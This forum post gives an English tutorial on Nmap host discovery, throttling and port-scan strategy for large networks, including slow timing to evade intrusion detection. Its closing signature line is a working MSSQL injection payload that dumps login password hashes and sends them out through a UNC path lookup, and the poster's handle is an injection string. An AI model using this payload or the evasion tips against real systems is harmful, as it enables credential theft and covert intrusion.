Using NMAP with the brain

Iniciado por 'or '1'=1, Febrero 18, 2017, 04:50:37 AM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

Febrero 18, 2017, 04:50:37 AM Ultima modificación: Febrero 18, 2017, 07:41:04 PM por 'or '1'=1
Using NMAP with the brain

Hey everyone, maybe you have read my posts before ... like every day I try to explain good tips for pentesters ... I work attacking real-world targets, it's very different of pentest-cookbook labs enviroment, so I spect you obtain good information of this thread. Go ahead!.

Our good and weird friend, NMAP:

In real world security practitioners are often faced with multiple class C's, class B's or even in some cases, class A networks, we'll take the rest of this article to make a scan strategy for networks of all kind and sizes, and of course, tips and tricks ;).

If you see NMAP and No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, you can have an idea of how work with NMAP, I make my own and I'll start now.

Host discovery:

A methodical scanning usually involves perfoming host discovery first, this can prevent to scan amounts of dead IP space, this methods are listed:

Código: bash
 -sn: Ping Scan - disable port scan
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping

The option we will focus on in this article is the most popular and the default for host discovery (-sn "Ping Scan").

One thing to note about the -sn "Ping Scan" option (formerly known as -sP) is that it does much more than just a traditional ICMP echo request. "Ping scan" consists of the following packets:

ICMP echo request
TCP SYN to 443
TCP ACK to 80
ICMP timestamp request

You can see the sequence here:


When you scan a local network, NMAP automatically switches to use ARP requests. This is obvious because fewer packets are sent and it's generally more accurate. Firewalls or another systems generally block or report ICMP traffic and filters TPC ports 80 and 443, so with this would be invisible to the four remote discovery packets sents above. However, host typically answer to ARP request to construct packet headers.

For the first packet capture, the scanning host was placed on a different subnet than that of the targets--this caused Nmap to use the 4 discovery packets shown in the picture.  For the second packet capture, the scanning host was placed in the same broadcast range and this ARP was utilized for discovery.  Both of the packet captures were created with the same discovery scan shown below.

Okay go more deep:

Código: bash
nmap -sn -T4 -oA Discovery

CitarOptions explained:
-sn = "Ping scan"
-T4 = Throttle to aggressive
-oA <basename>= Output in all three formats (normal, XML, greppable)

Throttling Pro-tips:

Aggressive (-T4) throttling is substantially faster than the default Normal (-T3) throttle.

We have rarely (if ever) seen Aggressive scanning crash a host or flood a network.  This should be what you start with unless you know of particular hosts that are sensitive to scanning.  With that said, if hosts are known to crash on simple scans or become easily flooded, avoid scanning them with -T4 and possibly try Polite (-T2) throttling.

Please realize that -T2 may be up to 10 times slower than -T3, so be patient and only run it on your most sensitive hosts (not hundreds at a time).

More importantly, avoid any one-off scans such as version scanning as these are more likely to crash hosts than the speed of the scan.  Some older SCADA components are known to fall over from simple port scanning, not to mention version scanning.  In general, we do not recommend Insane mode (-T5) as this can negatively affect accuracy.

Lastly, we only recommend -T0 or -T1 when trying to be extra stealthy (IDS evasion) and only for scanning a few ports on a few hosts because it will likely be too slow for anything else.

Generate host-up-list

Nmap can scan huge amount of Ip addresses with iL option, we don't want to scan all the result of the recent scan (discovery), because we obtain live and dead hosts, so here is our friend NMAP who have output files, we can obtain all the dump with -oA option:

Código: bash
[email protected]:~/Tests/Results/nmap/recon/# ls
Discovery.gnmap  Discovery.nmap  Discovery.xml

Files explained:
.nmap = Normal output (what is printed to the screen)
.gnmap = Greppable output
.xml = XML output

We will extract the up hosts from the .gnmap file using grep:

Código: bash
grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > upHost.txt

Cut options explained:
-f = field number (in this case, field 2)
-d = delimiter (in this case, a space)

Port discovery:

Okay we can our up hosts, we can start port discovery on these hosts. You need to have present if you have many up hosts or not you will select different kind of scans:

  • Most common ports
  • Full port scans

Source: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

So like a resume, TOP 1000 TCP  ~ TOP 1000 UDP.
1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--